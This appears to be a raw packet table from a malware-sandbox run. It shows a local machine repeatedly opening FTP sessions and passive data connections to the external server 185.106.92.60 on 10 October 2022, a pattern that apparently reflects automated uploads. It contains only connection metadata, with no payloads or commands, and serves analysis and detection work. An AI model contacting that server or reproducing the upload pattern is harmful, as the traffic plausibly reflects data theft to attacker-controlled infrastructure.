                                                                                                                                    Oct 10, 2022 06:03:50.601013899 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.628870010 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.628968000 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.629884958 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.657190084 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.657372952 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.657866955 CEST5007064731192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.680749893 CEST6473150070185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.680912018 CEST5007064731192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.681185961 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.762677908 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.770750046 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.775105953 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.775866032 CEST5007064731192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.799413919 CEST6473150070185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.799468040 CEST6473150070185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.803157091 CEST5007064731192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.803304911 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.805361032 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.806406021 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.834641933 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.834676027 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.834911108 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.973860025 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.997215986 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.997373104 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.023516893 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.023552895 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.023574114 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.023757935 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.024380922 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.047225952 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.049997091 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.059552908 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.082802057 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.084008932 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.084208965 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.107197046 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.107597113 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.107873917 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.131225109 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.133016109 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.133488894 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.156677961 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.158049107 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.159336090 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.183248997 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.183384895 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.184407949 CEST5007264732192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.208178043 CEST6473250072185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.208302021 CEST5007264732192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.208801985 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.232091904 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.235127926 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.236779928 CEST5007264732192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.260199070 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.261356115 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.261497974 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.261610985 CEST6473250072185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.261631012 CEST6473250072185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.261804104 CEST5007264732192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.284351110 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.284388065 CEST2150071185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.284715891 CEST5007121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.508375883 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.531016111 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.532054901 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.557420015 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.557566881 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.557796001 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.557815075 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.557919979 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.558228016 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.580809116 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.581887007 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.581958055 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.604692936 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.604902029 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.605103016 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.627666950 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.627810955 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.628067017 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.651271105 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.651648045 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.652371883 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.675126076 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.679119110 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.680425882 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.703342915 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.707109928 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.711220026 CEST5007464734192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.734230995 CEST6473450074185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.734370947 CEST5007464734192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.734750032 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.758021116 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.758227110 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.758742094 CEST5007464734192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.781459093 CEST6473450074185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.781533957 CEST6473450074185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.781795979 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.781831980 CEST5007464734192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.781868935 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.782555103 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.805114031 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.805191994 CEST2150073185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.805373907 CEST5007321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.934475899 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.960736990 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.960953951 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.991210938 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.991250038 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.991384029 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:51.991420031 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.991477966 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:51.991671085 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.016561985 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.016782045 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.016911983 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.040802002 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.041096926 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.044047117 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.069013119 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.069194078 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.069340944 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.094690084 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.094858885 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.096024036 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.124479055 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.124686003 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.125966072 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.149990082 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.150064945 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.150276899 CEST5007664735192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.172805071 CEST6473550076185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.172930002 CEST5007664735192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.173500061 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.200565100 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.200653076 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.201153040 CEST5007664735192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.223774910 CEST6473550076185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.223925114 CEST6473550076185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.224078894 CEST5007664735192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.224780083 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.224864006 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.225076914 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.249722004 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.249768972 CEST2150075185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.249830961 CEST5007521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.363629103 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.386440039 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.386662960 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.414434910 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.414486885 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.414520025 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.414722919 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.414722919 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.414937019 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.438009024 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.438282967 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.461564064 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.484519005 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.484616995 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.484822989 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.507483006 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.507636070 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.507755995 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.530730009 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.530903101 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.535638094 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.558455944 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.558541059 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.559434891 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.582442999 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.582627058 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.583307028 CEST5007864736192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.607109070 CEST6473650078185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.607295036 CEST5007864736192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.607893944 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.631508112 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.631728888 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.636066914 CEST5007864736192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.661015034 CEST6473650078185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.661063910 CEST6473650078185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.661096096 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.661156893 CEST5007864736192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.661168098 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.662411928 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.684751987 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.684803009 CEST2150077185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.684870958 CEST5007721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.801846027 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.830584049 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.832551003 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.860380888 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.860409975 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.860532045 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.860532045 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.860536098 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.860579014 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.860699892 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.886113882 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.886192083 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.886322975 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.911607027 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.911695957 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.911869049 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.939438105 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.939519882 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.939743996 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.967588902 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.967740059 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.970077991 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.997805119 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:52.997920036 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:52.999123096 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.027365923 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.027484894 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.027694941 CEST5008064737192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.054739952 CEST6473750080185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.055027962 CEST5008064737192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.055372953 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.080440998 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.081079960 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.081079960 CEST5008064737192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.110939026 CEST6473750080185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.110966921 CEST6473750080185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.110980988 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.111063004 CEST5008064737192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.111098051 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.115695000 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.142488956 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.142524004 CEST2150079185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.142632008 CEST5007921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.271126032 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.296674013 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.296897888 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.323663950 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.323702097 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.323935986 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.324074984 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.324153900 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.325237989 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.349221945 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.349411011 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.349503040 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.373909950 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.374089003 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.374226093 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.398117065 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.398336887 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.398449898 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.424968958 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.425911903 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.425911903 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.450515032 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.450707912 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.465919971 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.490916014 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.491063118 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.491235018 CEST5008264739192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.515600920 CEST6473950082185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.515748024 CEST5008264739192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.516134977 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.543024063 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.543308973 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.543973923 CEST5008264739192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.570168018 CEST6473950082185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.570194960 CEST6473950082185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.570210934 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.570352077 CEST5008264739192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.570399046 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.579432964 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.604708910 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.604753971 CEST2150081185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.604980946 CEST5008121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.708585978 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.733722925 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.735307932 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.763231039 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.763470888 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.763663054 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.763859987 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.763926983 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.765573978 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.789980888 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.790149927 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.790281057 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.815368891 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.817280054 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.820992947 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.846671104 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.847870111 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.851664066 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.876812935 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.877754927 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.878119946 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.902745962 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.902899027 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.905267000 CEST5008321192.168.2.3185.106.92.60
